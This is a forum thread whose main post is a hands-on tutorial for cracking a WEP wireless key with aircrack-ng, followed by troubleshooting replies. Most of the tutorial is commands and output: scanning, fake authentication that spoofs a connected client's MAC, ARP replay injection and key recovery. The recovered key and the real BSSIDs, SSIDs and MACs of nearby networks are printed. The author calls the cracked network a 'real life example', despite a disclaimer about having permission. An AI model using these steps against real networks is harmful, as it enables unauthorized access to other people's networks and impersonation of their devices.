Advertising (This ad goes away for registered users. You can Login or Register)

Attacking WEP wireless networks

Discuss security issues on computers here.
Content that is judged "dangerous" might be removed without prior notice
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Attacking WEP wireless networks

Post by m0skit0 »

This tutorial is aimed to learning purposes only. You should use it on a network only if you have the administrator's permission. Use it under your own responsibility!

This tutorial will suppose the following:
  • Running on a system with BASH interpreter (e.g. Linux)
  • Wireless card that supports monitor mode and packet injection (e.g. Atheros chipset) working properly and with adequate drivers (this only matters on Windows)
  • Aircrack suite (airmon, airodump, aireplay, aircrack) installed and operational
Attacking a WEP-encrypted wireless network is fairly easy. This is due to a statistical vulnerability in WEP encryption scheme. Without entering into much details, if someone can capture a big number of useful packets containg a different IV (initialization vector), the key cracking process can be significantly reduced. You can check more info here.

First thing that we have to do is to set our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.

$ sudo airmon-ng stop wlan0

Code: Select all

Interface	Chipset		Driver

wlan0		Unknown 	rt2800pci - [phy0]
				(monitor mode disabled)
$ sudo airmon-ng start wlan0

Code: Select all

Interface	Chipset		Driver

wlan0		Unknown 	rt2800pci - [phy0]
				(monitor mode enabled on mon0)
We make sure monitor device has been created:

$ ifconfig mon0

Code: Select all

mon0      Link encap:UNSPEC  HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:262666 (262.6 KB)  TX bytes:0 (0.0 B)
Now we do a first scan on what is on the air ;)

$ sudo airodump-ng mon0

Code: Select all

CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22                                         
                                                                                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                        
                                                                                                                                                                       
 64:68:0C:8D:9C:23  -33       10        1    0  11  54e  WPA  CCMP   PSK  JAZZTEL_9C22                                                                                 
 00:1A:2B:08:06:63  -70       11        0    0   3  54   WEP  WEP         WLAN_C2                                                                                      
 00:1A:2B:5B:D8:34  -70        8        0    0  11  54   WEP  WEP         JAZZTEL_0C                                                                                   
 00:24:17:18:40:FB  -78        9        0    0  11  54   WPA  TKIP   PSK  ORANGE-FB32FA                                                                                
 E8:39:DF:CF:D1:7E  -85        2        0    0   3  54e  WPA2 CCMP   PSK  Jazztel_A3                                                                                   
 40:4A:03:9E:E4:D0  -83        6        0    0   4  54 . WEP  WEP         WLAN_25                                                                                      
 00:21:63:6B:DA:58  -84        7        0    0  11  54e  WPA  TKIP   PSK  VodafoneDA57                                                                                 
 40:4A:03:BE:D6:A7  -84        7       58    0   9  54 . WEP  WEP         WLAN_A1                                                                                      
 00:1A:2B:13:98:1C  -83        9        0    0   3  54   WEP  WEP         WLAN_D7                                                                                      
 E8:39:DF:CF:D1:7D  -84        5        0    0   3  54e  WPA2 CCMP   PSK  Jazztel                                                                                       
 00:1D:6A:6C:F4:C3  -85        5        0    0   6  54e. WPA2 CCMP   PSK  Orange-80f4                                                                                  
 62:C7:14:33:18:5C  -86        6        0    0   7  54e  WPA  CCMP   PSK  vodafoneenrique01                                                                             
 88:25:2C:71:90:98  -86        8        0    0   6  54e. WEP  WEP         nuria                                                                                         
 00:13:49:89:27:7C  -87        8        0    0   9  54 . WEP  WEP         WLAN_91                                                                                       
 00:1A:2B:4A:6E:0E  -88        8        0    0  11  54   WEP  WEP         adsuar                                                                                       
 00:22:2D:3E:8D:48  -89        8        0    0  11  54e. WEP  WEP         lucy_david                                                                                   
 E0:91:53:49:70:DA  -90        9        1    0  10  54 . WEP  WEP         WLAN_78                                                                                       
 00:23:08:E3:C5:34  -90        3        4    0   9  54e. WEP  WEP         WLAN3C5903                                                                                    
 5C:33:8E:E0:63:3A  -90        5        0    0   6  54e. WPA2 CCMP   PSK  Reaviles_Madrid                                                                              
 50:67:F0:88:20:9C  -92        5        0    0   7  54 . WEP  WEP         WLAN_0B                                                                                      
 00:1A:2B:08:E4:BB  -93        0        0    0  11  54   WEP  WEP         galapagos                                                                                     
                                                                                                                                                                        
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                              
                                                                                                                                                                        
 (not associated)   40:28:49:55:A8:C2    0    0 - 1      0       11                                                                                                     
 64:68:0C:8D:9C:23  7C:61:93:E5:6B:5B  -40    0 - 5e     0        1                                                                                                     
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54    238       61  WLAN_A1    
With airodump we're completely undetected. We're only listening to what's on the air. Since we are only interested in WEP networks, we'll filter by encryption:

$ sudo airodump-ng --encrypt wep mon0

Code: Select all

CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23                                          
                                                                                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                        
                                                                                                                                                                       
 00:1A:2B:5B:D8:34  -70       18        0    0  11  54   WEP  WEP         JAZZTEL_0C                                                                                   
 00:1A:2B:08:06:63  -70       19        0    0   3  54   WEP  WEP         WLAN_C2                                                                                      
 00:1A:2B:13:98:1C  -82       19        0    0   3  54   WEP  WEP         WLAN_D7                                                                                      
 40:4A:03:9E:E4:D0  -84       17        0    0   4  54 . WEP  WEP         WLAN_25                                                                                      
 40:4A:03:BE:D6:A7  -84       16      182    0   9  54 . WEP  WEP         WLAN_A1                                                                                      
 00:13:49:89:27:7C  -87       13        0    0   9  54 . WEP  WEP         WLAN_91                                                                                      
 88:25:2C:71:90:98  -87       15        0    0   6  54e. WEP  WEP         nuria                                                                                        
 00:22:2D:3E:8D:48  -87       10        0    0  11  54e. WEP  WEP         lucy_david                                                                                    
 00:1A:2B:4A:6E:0E  -88       11        0    0  11  54   WEP  WEP         adsuar                                                                                        
 00:23:08:E3:C5:34  -89        4        0    0   9  54e. WEP  WEP         WLAN3C5903                                                                                    
 E0:91:53:49:70:DA  -90        7        0    0  10  54 . WEP  WEP         WLAN_78                                                                                       
 64:68:0C:6C:9C:11  -92        2        0    0   6  54   WEP  WEP         Wireless Jazztel                                                                              
 50:67:F0:88:20:9C  -92        4        0    0   7  54 . WEP  WEP         WLAN_0B                                                                                       
 00:1A:2B:08:E4:BB  -93        6        0    0  11  54   WEP  WEP         galapagos                                                                                     
 00:60:4C:98:61:89  -95        2        0    0   6  54 . WEP  WEP         adsl4917                                                                                      
                                                                                                                                                                        
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                              
                                                                                                                                                                        
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -72    0 -54    240      181     
We're searching for networks with high #Data output. WLAN_A1 network seems an excellent candidate. We'll filter by that network now:

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0

Code: Select all

 CH  9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27                                          
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  -88   6       74      475   44   9  54 . WEP  WEP         WLAN_A1                                                                                  
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54     99      473                                                                                                     
Yeah this one seems ideal to attack. It even has an associated client (with MAC E0:B9:A5:66:F7:9E), which is great because he generates data (and not only beacons). We're going to log those IVs to use them later to crack the WEP key:

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0

Code: Select all

 CH  9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30                                          
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  -88   7       91      519   47   9  54 . WEP  WEP         WLAN_A1                                                                                  
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54     74      519
As we see, the connected cliented is already generating a lot of data. But what if he stops doing so, or disconnects? To prevent this, we're going to fake this client. First of all, we're going to fake the client's authentication, so it seems to the AP he never disconnected. Notice how we use the client's MAC with -h switch. All auth packets are been sent by his MAC, so we're still hidden.

$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0

Code: Select all

The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9

01:33:27  Sending Authentication Request (Open System)
01:33:27  Authentication successful
01:33:27  Sending Association Request
01:33:27  Association successful :-) (AID: 1)
 [ACK]
This will repeat authentication every 10 seconds. Now even if he disconnects, the AP will still think he's connected. Now time to gather some of his data to generate more replies from the AP. This is useful in case he disconnects, to reuse later when he's disconnected or simply to generate more data. Notice again the use -h switch with client's MAC address.

$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0

Code: Select all

The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)
We got ARP requests and we're sending them back to the AP to generate even more data packets. This should increase IVs gathering, as we see:

Code: Select all

CH  9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38                                          
                                                                                                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                   
                                                                                                                                                                      
 40:4A:03:BE:D6:A7  -84  45     4072    34576  361   9  54 . WEP  WEP    OPN  WLAN_A1                                                                                 
                                                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                            
                                                                                                                                                                      
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E    0   24 - 1   8121    81946  WLAN_A1
This should be enough to crack the WEP key. Let's launch aircrack proper ;) See the use of -c switch to limit cracking to alphanumeric characters, which are most likely used.

$ aircrack-ng -c WLAN_A1-01.ivs

Code: Select all

Opening WLAN_A1-01.ivs
Read 51527 packets.

   #  BSSID              ESSID                     Encryption

   1  40:4A:03:BE:D6:A7  WLAN_A1                   WEP (51526 IVs)

Choosing first network as target.

Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.


                                                                            Aircrack-ng 1.1 r1904


                                                            [00:00:00] Tested 37 keys (got 30056 IVs)

   KB    depth   byte(vote)
    0    0/  2   5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816) 
    1    7/  8   6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304) 
    2    3/  2   8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304) 
    3    4/  3   C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304) 
    4    0/  2   33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816) 

     KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
	Decrypted correctly: 100%
And done! :) This is the easiest case you can find, but as you can see WEP encryption is pretty useless. This network's key was cracked in around 15 mins.

Hope this was useful for you, see you! ;)
Advertising
I wanna lots of mov al,0xb
Image
"just not into this RA stuffz"
ASKidwai
Posts: 937
Joined: Mon Jan 10, 2011 7:42 am
Location: 'Ere and There
Contact:

Re: Attacking WEP wireless networks

Post by ASKidwai »

Nice guide and thanks but

Code: Select all

sudo airmon-ng start wlan-0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
739	avahi-daemon
740	NetworkManager
743	avahi-daemon
819	wpa_supplicant
1300	dhclient
Process with PID 1300 (dhclient) is running on interface wlan0


Interface	Chipset		Driver

wlan0		Unknown 		rtl819xSE
I get this after sudo airmon-ng start wlan-0
on Ubuntu 10.04

Not sure if this helps but

Code: Select all

03:00.0 Ethernet controller [0200]: Atheros Communications Atheros AR8132 / L1c Gigabit Ethernet Adapter [1969:1062] (rev c0)
	Subsystem: LG Electronics, Inc. Device [1854:200d]
	Flags: bus master, fast devsel, latency 0, IRQ 30
	Memory at febc0000 (64-bit, non-prefetchable) [size=256K]
	I/O ports at dc00 [size=128]
	Capabilities: [40] Power Management version 3
	Capabilities: [48] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0
Advertising
Image
Image
Image
Image
Halvhjearne
Posts: 664
Joined: Mon Mar 14, 2011 1:58 am
Location: Denmark

Re: Attacking WEP wireless networks

Post by Halvhjearne »

nice guide alltho it is beginning to be useless, as no one in there right mind would still use WEP ...

still its good info and a nice guide, i was messing with these commands a little while ago but kinda gave up on it .. i might try again after reading this .. thanx m0skit0 :mrgreen:
Dr. Evil wrote:I used to use Windows, but it was designed by freakin' idiots.
Now i use linux allowing me to conrol the "lasers" on my "death star" with ease.
I'm Dr. Evil, and I'm aspiring to take over the world.
skilgannon
Posts: 34
Joined: Tue Nov 16, 2010 6:06 am

Re: Attacking WEP wireless networks

Post by skilgannon »

i have been doing this for bit under a year now but i have to use backtrack cos i get the ap is on channel (whatever channel) but channel is locked to -1 i have tried many different fixes and googled for the last year for a solution but nothing seems to work but works perfect on backtrack. it does this stupid -1 channel thing on ubuntu 11.04 im sick of having to use 3 different OS for different things does anybody know a fix for this (hopefully one i havent tried yet)
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

ASKidwai wrote:Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
Those are processes that are using network resources. You should only kill them if they're interfering with aircrack. If aircrack suite works properly, no need to touch them. Just FYI to kill a process you have to use the kill tool, like

Code: Select all

kill -TERM process_id
or in case it doesn't finish

Code: Select all

kill -KILL process_id
This will kill it for sure. Do not use -KILL at first or you might lose the data the process is handling.
Halvhjearne wrote:it is beginning to be useless, as no one in there right mind would still use WEP ...
There are plenty of people out of mind. In fact this tuto is a real life example.
skilgannon wrote:channel is locked to -1
IIRC you have to patch aircrack for that. Anyway, I use BackTrack too.
I wanna lots of mov al,0xb
Image
"just not into this RA stuffz"
codestation
Big Beholder
Posts: 1660
Joined: Wed Jan 19, 2011 3:45 pm
Location: /dev/negi

Re: Attacking WEP wireless networks

Post by codestation »

m0skit0 wrote:
skilgannon wrote:channel is locked to -1
IIRC you have to patch aircrack for that. Anyway, I use BackTrack too.
Its a kernel patch (if you have one for aircrack itself let me know, i tend to forgot to patch my kernel when updating).

http://patches.aircrack-ng.org/channel- ... axim.patch

Dunno why this isn't in mainline yet :?

P.D.: are you going to add what to do if the AP doesn't have any clients? I like your approach since the tutos at aircrack website doesn't cover these little things that you add to make the attack session more easier.
Plugin list
Working on: QPSNProxy, QCMA - Open source content manager for the PS Vita
Playing: Error: ENOTIME
Repositories: github, google code
Just feel the code..
ASKidwai
Posts: 937
Joined: Mon Jan 10, 2011 7:42 am
Location: 'Ere and There
Contact:

Re: Attacking WEP wireless networks

Post by ASKidwai »

OK.

I'll try when I get back to Linux. I still use WEP because no-one actually knows what WPA is :P
Image
Image
Image
Image
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

codestation wrote:Its a kernel patch
Yup, sorry :oops:
codestation wrote:are you going to add what to do if the AP doesn't have any clients?
If I remember I cracked one using ChopChop attack. I'll try to refresh my memory and post what I've remembered ;)
I wanna lots of mov al,0xb
Image
"just not into this RA stuffz"
skilgannon
Posts: 34
Joined: Tue Nov 16, 2010 6:06 am

Re: Attacking WEP wireless networks

Post by skilgannon »

ive patched the kernel before and bricked my laptop had to use my recovery disks so im a bit scared to try again but it was different from the one you posted i have heard people download a second version of the kernel and then patch it so you dont mess up your original but then i dont know how to apply it
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

skilgannon wrote:bricked my laptop
Laptops do not brick, they're open systems. You don't have to fear anything, a laptop does not "break" for such things.
I wanna lots of mov al,0xb
Image
"just not into this RA stuffz"
Locked

Return to “Security”